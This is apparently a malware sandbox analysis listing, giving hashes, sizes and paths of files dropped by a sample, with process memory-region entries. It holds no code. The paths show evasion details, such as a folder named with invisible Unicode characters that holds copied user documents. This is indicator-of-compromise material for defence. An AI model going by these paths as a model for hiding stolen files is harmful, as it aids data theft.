6568982977b8adb6ee04b777a976a2ecc3e4db1dffbd20004003a204eb5dae5980231c76c756d59a5309c2b1456cb63ab7671705a2c2e454c667642beb018c21

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10522\sqlite3.dll

Filesize
630KB

MD5
cc9d1869f9305b5a695fc5e76bd57b72

SHA1
c6a28791035e7e10cfae0ab51e9a5a8328ea55c1

SHA256
31cb4332ed49ce9b31500725bc667c427a5f5a2a304595beca14902ba7b7eeee

SHA512
e6c96c7c7665711608a1ba6563b7b4adb71d0bf23326716e34979166de65bc2d93cb85d0cb76475d55fd042da97df978f1423c099ad5fbeeaef8c3d5e0eb7be1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10522\unicodedata.pyd

Filesize
295KB

MD5
6279c26d085d1b2efd53e9c3e74d0285

SHA1
bd0d274fb9502406b6b9a5756760b78919fa2518

SHA256
411bfb954b38ec4282d10cecb5115e29bffb0b0204ffe471a4b80777144b00f6

SHA512
30fdeed6380641fbb4d951d290a562c76dd44b59194e86f550a4a819f46a0deb7c7a2d94867cc367c41dcab9efb95628d65fe9a039c0e14a679c149148d82ac9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57922\blank.aes

Filesize
123KB

MD5
e8aae158e5d849d52578d8d39decd3f3

SHA1
a3f21b76c742ebac0cb03b063415acb912033595

SHA256
f91fd303bb95839ef503a47490f6745252625f296e4dd3d0d465d7d6124b5331

SHA512
e7286b302a1e928756c1e0f5f02199ff7a2c22cbf0a99128d6e4bd200de2876232ede758ddf3ebae618d67025cf26c1675ee15bbf1a7a422fabd900c466212f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlu0ypbm.mxq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bound.exe

Filesize
38KB

MD5
c84a7ccc95f831358fa4628d77ed41cc

SHA1
9a500ded472d418d49dcab8a34a0b68c5d5837c0

SHA256
3c6e0adf8baf18ce229b65b68a70a242a1504636f6677f878c04f4d794c4f802

SHA512
e9b216fb16ce55106b2b19396be81a70c73e8b51061b0df4a1c0a27f24d72c3f0d1bee7ef357dc8e7ceee97ab3494603b4da4b03bd24a3420b945321884e4378

Download Submit
C:\Users\Admin\AppData\Local\Temp\kbakst.exe

Filesize
7.5MB

MD5
08d3f972602755f9941054edc2b97d96

SHA1
7a0b77b41e241d4c70d9e7a74bd7da10bdddeb58

SHA256
9efb448ed0cc9519bd5b954444261f5af7d1d148bcc4059a9b1cb82382c80206

SHA512
dbf2a57f4e3376093a84c0f05dab3b867ceb61a5b0ef83283f3ccba499219c15e89754afd1b50f47b5377db47fb168f3d9ac74afbec5987386828d4e37624930

Download Submit
C:\Users\Admin\AppData\Local\Temp\xivvijqs\xivvijqs.dll

Filesize
4KB

MD5
7048104f0c7da2744a065a47976a9b74

SHA1
60a8ff1c54c7596d8571ccec555dbe046f5d2959

SHA256
41dab0c000e713a0a1cf2ea5dbf481b94331899fde045411a7a0878449b14d25

SHA512
310ac6db27607eb8920bdf5d5b56ba3fa97bbe87426788ae5ec01ac8e37703c1684e5017fe82e793ebcba0717e7c725109543b7d1abfff810449f18968a60650

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌ ‎ \Common Files\Desktop\BackupLimit.sys

Filesize
170KB

MD5
cb4645a3252ab765ac442d715014cc18

SHA1
e04609189f05c2b9fed0ca2664472482d6c904f3

SHA256
a6ca42bba4a5ad9ae39d772c91a28261234c5a175bd983576b866afd7844307d

SHA512
8726d70dba92330ad82a6c7d43a28f9dd08818b48d2427df357740147320fbaca457cb7b6c190d33ccf45d847b72e46f799280926e0f407b99d5c5ef613dbb2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌ ‎ \Common Files\Desktop\ConvertToSelect.xlsx

Filesize
213KB

MD5
ed6f8ce3e4a5e3d5a742a51aa456ed09

SHA1
57a222c3112373722dbd08c73db23e9b88327862

SHA256
17c4eec9a89b999879ce07930337a3b74d7940e8d4f4fb8403789add88af8099

SHA512
c1752c71e67b8ec3163f767a729217676637e6463a1c288bf0a2f1ef79926f76b59a22b93dbc2f329f130499a0d40f8a938bb42fdfa6099a74e4f371648f40f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌ ‎ \Common Files\Desktop\DisableApprove.xlsx

Filesize
10KB

MD5
4088346ebcfcdfb428dbec00bddade54

SHA1
2638114d96703aafbaa5ca4201dffdfdf9f20c92

SHA256
72b0749fb9693f70cb625f4396e41f81e109e9587bb87b753c8566a8dd4089ca

SHA512
c6aae568e10c3e9f0026ab23da54feae4db466bdf06a35d2d116bdb70617779ba42d7572b6df3aef16b4b7310b4c316527c3cbf89993857cdba1b3a72c427170

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌ ‎ \Common Files\Desktop\TraceExit.jpg

Filesize
128KB

MD5
4cf2b4551f5f215a09dde867466a1178

SHA1
a4305e84371be9a0bd4f25822d38c7c64b4be78a

SHA256
c75c2ff4cd6d7d57f8dda3cc7551f1d836a2d9bab6b5895b340f21c62c8becd8

SHA512
b238c91b347721648638664fa3738b8dd0d23fe7b1b5700bd3e69e06a703c919bf4672c9b4e43881f488ddd9edde6e6ec9a316653fada906397030e7c0a97624

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌ ‎ \Common Files\Documents\ApproveBackup.potm

Filesize
940KB

MD5
439c651381e1aaa3d5d554f8eede9b62

SHA1
33158ee6e67129b3ecf7daa973f5a1b5daade4fc

SHA256
e1b17966492170b83e55d4a37eb4262d029918198abaeba4ef63e584596feb03

SHA512
d97dc9a178ff31bb5ad549d6d4ac1dcee42015677114cc8e352a03d4dff0ac55739952222a2cdb70f16548dfd0f5968c25b4da56b2a5eaf7a78585ffc223ef27

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌ ‎ \Common Files\Documents\ApproveMount.xlsx

Filesize
10KB

MD5
5e2599e12dbf13d70408fbb5cbde3b1c

SHA1
c600da7f9600f527fbcedafb66ffe879a5300081

SHA256
68c178965a46959091d310e894565d405520d4762e00940d9941bf5c6b7d1a9d

SHA512
693fc3adf5f30c210bdeea9aef6c09589f5aee450448b35bb657bb5ff4c42188ed286cc5cc58349439c3e6170bd20d4cb4ccfeeac56444b1beeb600dda147c57

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌ ‎ \Common Files\Documents\BlockPublish.docx

Filesize
877KB

MD5
f19291375d6a95fbc1dcae4ba3a322ed

SHA1
0d5d460420e5cee0e8824d3089dfd66f2c0febb1

SHA256
04c58585632216a0460ee22b813d3f89b596ad992d7be514c1548553af2939d8

SHA512
fe0927d1de6443740e20ed3eccb01b71fe96ee54ec804f4609ac41f932d14be4b95d8e5644b7588546879223b34deb5251ca52259c931c9a7b778f41cc5dd82e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌ ‎ \Common Files\Documents\DenyOut.xlsx

Filesize
14KB

MD5
fd776fd898a1625aba4fb9687bacfe42

SHA1
8831dcb8e7963c9dcfa1f001450fc0002e12445b

SHA256
7e6db8dad24b66b23820bedb5067e5ce73fa5877a7e71990057894e7091fc22c

SHA512
cde848f851164c47fac9edfb8040dc8d0cac216783550743bf207f72aa02b723cc39f0e89d0242920e0a5fbb17d9332afa7a75f53c94f7c1117456505b994591

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌ ‎ \Common Files\Documents\EnterHide.docx

Filesize
17KB

MD5
cd9211431b6f2a2b5193aec5e8865eeb

SHA1
595d920bbc24c36ed8da501aa76d6753d21fbd9b

SHA256
ef4885bce1cb3c8218fa5910db55320169706d25c480829674ea86aad3ff9638

SHA512
8d4b4270a2de108ef42dafef8da6da6f67feede80ab4bbee90f069e5abedee4fd11cc1d6173627abe4e78aa864c4dc044938659a8bba8d54c7ee0429e8d1cb11

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xivvijqs\CSCCE7146ED6CDB4553A96441B447C92437.TMP

Filesize
652B

MD5
d882fc7006d67191a31261e837d168f8

SHA1
946baa04ec78dd3a31b46acf32032a5ad88630b1

SHA256
5daa0a00257024e3ac531f72678e50a475bfe5bdd4686542210d59b10f42a232

SHA512
b6a5b2272bafad5d0e92944715aa560bf44043ceeb673d92f7d5bbb00ee2cd9bff3bf488c72821eee2dc1030bfefe2e5fc78387e15c9bd0e94476a8b6673e88c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xivvijqs\xivvijqs.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xivvijqs\xivvijqs.cmdline

Filesize
607B

MD5
6aba8d099460ae287690b9248c3515a5

SHA1
9e9808a8c4aa5f5289467e1d99d19f1eee636232

SHA256
0e8525b81f7d1db2b4474e8d372cdeb03c91782dccb74004c048fb7c6da7641f

SHA512
09765befab35c978119a1adee6affbbe24089fc02756c22f78eef00b9cc0c26c73e454a7fde8fe9079b6aae35d2423bf371b79ecc416fd5c7bbf7d1c9210a820

Download Submit
memory/216-215-0x000001C87A7E0000-0x000001C87A7E8000-memory.dmp

Filesize
32KB

Download
memory/2712-137-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download
memory/4416-153-0x0000024DDEAF0000-0x0000024DDEB12000-memory.dmp

Filesize
136KB

Download
memory/4452-72-0x00007FFC4AAB0000-0x00007FFC4AFD2000-memory.dmp

Filesize
5.1MB

Download
memory/4452-322-0x00007FFC4AFE0000-0x00007FFC4B0AD000-memory.dmp

Filesize
820KB

Download
memory/4452-190-0x00007FFC5A6E0000-0x00007FFC5A703000-memory.dmp

Filesize
140KB

Download
memory/4452-85-0x00007FFC5A710000-0x00007FFC5A73D000-memory.dmp

Filesize
180KB

Download
memory/4452-86-0x00007FFC4A230000-0x00007FFC4A34C000-memory.dmp

Filesize
1.1MB

Download
memory/4452-80-0x00007FFC5A3A0000-0x00007FFC5A3AD000-memory.dmp

Filesize
52KB

Download
memory/4452-74-0x00007FFC4B6A0000-0x00007FFC4BC8E000-memory.dmp

Filesize
5.9MB

Download
memory/4452-75-0x00007FFC4AFE0000-0x00007FFC4B0AD000-memory.dmp

Filesize
820KB

Download
memory/4452-77-0x00007FFC5F950000-0x00007FFC5F974000-memory.dmp

Filesize
144KB

Download
memory/4452-279-0x00007FFC5A6C0000-0x00007FFC5A6D9000-memory.dmp

Filesize
100KB

Download
memory/4452-78-0x00007FFC588F0000-0x00007FFC58904000-memory.dmp

Filesize
80KB

Download
memory/4452-73-0x000001CF17B10000-0x000001CF18032000-memory.dmp

Filesize
5.1MB

Download
memory/4452-71-0x00007FFC5A680000-0x00007FFC5A6B3000-memory.dmp

Filesize
204KB

Download
memory/4452-65-0x00007FFC5A6C0000-0x00007FFC5A6D9000-memory.dmp

Filesize
100KB

Download
memory/4452-66-0x00007FFC5E620000-0x00007FFC5E62D000-memory.dmp

Filesize
52KB

Download
memory/4452-62-0x00007FFC4B0B0000-0x00007FFC4B226000-memory.dmp

Filesize
1.5MB

Download
memory/4452-60-0x00007FFC5A6E0000-0x00007FFC5A703000-memory.dmp

Filesize
140KB

Download
memory/4452-58-0x00007FFC5AB90000-0x00007FFC5ABA9000-memory.dmp

Filesize
100KB

Download
memory/4452-56-0x00007FFC5A710000-0x00007FFC5A73D000-memory.dmp

Filesize
180KB

Download
memory/4452-50-0x00007FFC64350000-0x00007FFC6435F000-memory.dmp

Filesize
60KB

Download
memory/4452-309-0x00007FFC5A680000-0x00007FFC5A6B3000-memory.dmp

Filesize
204KB

Download
memory/4452-310-0x00007FFC4AAB0000-0x00007FFC4AFD2000-memory.dmp

Filesize
5.1MB

Download
memory/4452-311-0x000001CF17B10000-0x000001CF18032000-memory.dmp

Filesize
5.1MB

Download
memory/4452-512-0x00007FFC4AAB0000-0x00007FFC4AFD2000-memory.dmp

Filesize
5.1MB

Download
memory/4452-333-0x00007FFC4B6A0000-0x00007FFC4BC8E000-memory.dmp

Filesize
5.9MB

Download
memory/4452-339-0x00007FFC4B0B0000-0x00007FFC4B226000-memory.dmp

Filesize
1.5MB

Download
memory/4452-347-0x00007FFC4A230000-0x00007FFC4A34C000-memory.dmp

Filesize
1.1MB

Download
memory/4452-334-0x00007FFC5F950000-0x00007FFC5F974000-memory.dmp

Filesize
144KB

Download
memory/4452-363-0x00007FFC4B6A0000-0x00007FFC4BC8E000-memory.dmp

Filesize
5.9MB

Download
memory/4452-31-0x00007FFC5F950000-0x00007FFC5F974000-memory.dmp

Filesize
144KB

Download
memory/4452-513-0x00007FFC4B6A0000-0x00007FFC4BC8E000-memory.dmp

Filesize
5.9MB

Download
memory/4452-514-0x00007FFC588F0000-0x00007FFC58904000-memory.dmp

Filesize
80KB

Download
memory/4452-515-0x00007FFC5A3A0000-0x00007FFC5A3AD000-memory.dmp

Filesize
52KB

Download
memory/4452-26-0x00007FFC4B6A0000-0x00007FFC4BC8E000-memory.dmp

Filesize
5.9MB

Download
memory/4452-516-0x00007FFC4A230000-0x00007FFC4A34C000-memory.dmp

Filesize
1.1MB

Download
memory/4452-502-0x00007FFC4AFE0000-0x00007FFC4B0AD000-memory.dmp

Filesize
820KB

Download
memory/4452-503-0x00007FFC5F950000-0x00007FFC5F974000-memory.dmp

Filesize
144KB

Download
memory/4452-504-0x00007FFC64350000-0x00007FFC6435F000-memory.dmp

Filesize
60KB

Download
memory/4452-505-0x00007FFC5A710000-0x00007FFC5A73D000-memory.dmp

Filesize
180KB

Download
memory/4452-207-0x00007FFC4B0B0000-0x00007FFC4B226000-memory.dmp

Filesize
1.5MB

Download
memory/4452-506-0x00007FFC5AB90000-0x00007FFC5ABA9000-memory.dmp

Filesize
100KB

Download
memory/4452-507-0x00007FFC5A6E0000-0x00007FFC5A703000-memory.dmp

Filesize
140KB

Download
memory/4452-508-0x00007FFC4B0B0000-0x00007FFC4B226000-memory.dmp

Filesize
1.5MB

Download
memory/4452-509-0x00007FFC5A6C0000-0x00007FFC5A6D9000-memory.dmp

Filesize
100KB

Download
memory/4452-510-0x00007FFC5E620000-0x00007FFC5E62D000-memory.dmp

Filesize
52KB

Download
memory/4452-511-0x00007FFC5A680000-0x00007FFC5A6B3000-memory.dmp

Filesize
204KB

Download
memory/5900-438-0x00007FFC5AE20000-0x00007FFC5AE2D000-memory.dmp

Filesize
52KB

Download
memory/5900-447-0x00007FFC586C0000-0x00007FFC586CD000-memory.dmp

Filesize
52KB

Download
memory/5900-446-0x00007FFC5A460000-0x00007FFC5A48D000-memory.dmp

Filesize
180KB

Download
memory/5900-452-0x00007FFC5A3B0000-0x00007FFC5A3C9000-memory.dmp

Filesize
100KB

Download
memory/5900-466-0x00007FFC4B4E0000-0x00007FFC4B513000-memory.dmp

Filesize
204KB

Download
memory/5900-467-0x00007FFC4A9E0000-0x00007FFC4AAAD000-memory.dmp

Filesize
820KB

Download
memory/5900-471-0x00007FFC586C0000-0x00007FFC586CD000-memory.dmp

Filesize
52KB

Download
memory/5900-470-0x00007FFC4A9C0000-0x00007FFC4A9D4000-memory.dmp

Filesize
80KB

Download
memory/5900-469-0x00007FFC415C0000-0x00007FFC41BAE000-memory.dmp

Filesize
5.9MB

Download
memory/5900-468-0x00007FFC41090000-0x00007FFC415B2000-memory.dmp

Filesize
5.1MB

Download
memory/5900-465-0x00007FFC5AE20000-0x00007FFC5AE2D000-memory.dmp

Filesize
52KB

Download
memory/5900-464-0x00007FFC4BCA0000-0x00007FFC4BCB9000-memory.dmp

Filesize
100KB

Download
memory/5900-463-0x00007FFC4B520000-0x00007FFC4B696000-memory.dmp

Filesize
1.5MB

Download
memory/5900-462-0x00007FFC56040000-0x00007FFC56063000-memory.dmp

Filesize
140KB

Download
memory/5900-451-0x00007FFC5A460000-0x00007FFC5A48D000-memory.dmp

Filesize
180KB

Download
memory/5900-450-0x00007FFC5AE30000-0x00007FFC5AE3F000-memory.dmp

Filesize
60KB

Download
memory/5900-449-0x00007FFC5A490000-0x00007FFC5A4B4000-memory.dmp

Filesize
144KB

Download
memory/5900-445-0x00007FFC4A9C0000-0x00007FFC4A9D4000-memory.dmp

Filesize
80KB

Download
memory/5900-442-0x00007FFC41090000-0x00007FFC415B2000-memory.dmp

Filesize
5.1MB

Download
memory/5900-443-0x0000010F2F6F0000-0x0000010F2FC12000-memory.dmp

Filesize
5.1MB

Download
memory/5900-444-0x00007FFC5A490000-0x00007FFC5A4B4000-memory.dmp

Filesize
144KB

Download
memory/5900-440-0x00007FFC415C0000-0x00007FFC41BAE000-memory.dmp

Filesize
5.9MB

Download
memory/5900-441-0x00007FFC4A9E0000-0x00007FFC4AAAD000-memory.dmp

Filesize
820KB

Download
memory/5900-439-0x00007FFC4B4E0000-0x00007FFC4B513000-memory.dmp

Filesize
204KB

Download
memory/5900-437-0x00007FFC4BCA0000-0x00007FFC4BCB9000-memory.dmp

Filesize
100KB

Download
memory/5900-436-0x00007FFC4B520000-0x00007FFC4B696000-memory.dmp

Filesize
1.5MB

Download
memory/5900-435-0x00007FFC56040000-0x00007FFC56063000-memory.dmp

Filesize
140KB

Download
memory/5900-434-0x00007FFC5A3B0000-0x00007FFC5A3C9000-memory.dmp

Filesize
100KB

Download
memory/5900-433-0x00007FFC5A460000-0x00007FFC5A48D000-memory.dmp

Filesize
180KB

Download
memory/5900-428-0x00007FFC5AE30000-0x00007FFC5AE3F000-memory.dmp

Filesize
60KB

Download
memory/5900-427-0x00007FFC5A490000-0x00007FFC5A4B4000-memory.dmp

Filesize
144KB

Download
memory/5900-426-0x00007FFC415C0000-0x00007FFC41BAE000-memory.dmp

Filesize
5.9MB

Download